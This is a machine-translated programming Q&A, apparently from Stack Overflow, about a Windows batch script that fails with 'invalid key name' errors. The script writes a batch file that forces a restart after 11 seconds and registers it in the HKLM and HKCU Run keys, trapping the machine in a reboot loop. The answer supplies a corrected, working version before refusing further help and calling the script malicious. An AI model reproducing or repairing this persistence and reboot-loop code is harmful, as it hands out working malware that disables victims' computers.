好的,所以我曾经在2003年制作批处理文件,这是一段旧代码
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo RIP
PAUSE
当我运行它时,我得到错误:两者的键名无效
thx
ps顺便说一句,观众希望我销毁我的PC,以便在测试时在虚拟机中运行它
答案 0 :(得分:0)
作为我的评论的后续,这是您的代码,其中重新添加了“残破”键:
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v /t reg_sz /d c:\windows\hartlell.bat /f
echo RIP
PAUSE
由于该脚本本质上是恶意 ,因此我不会为该脚本提供任何进一步的帮助,该脚本还有其他问题不在您的讨论范围之内。 >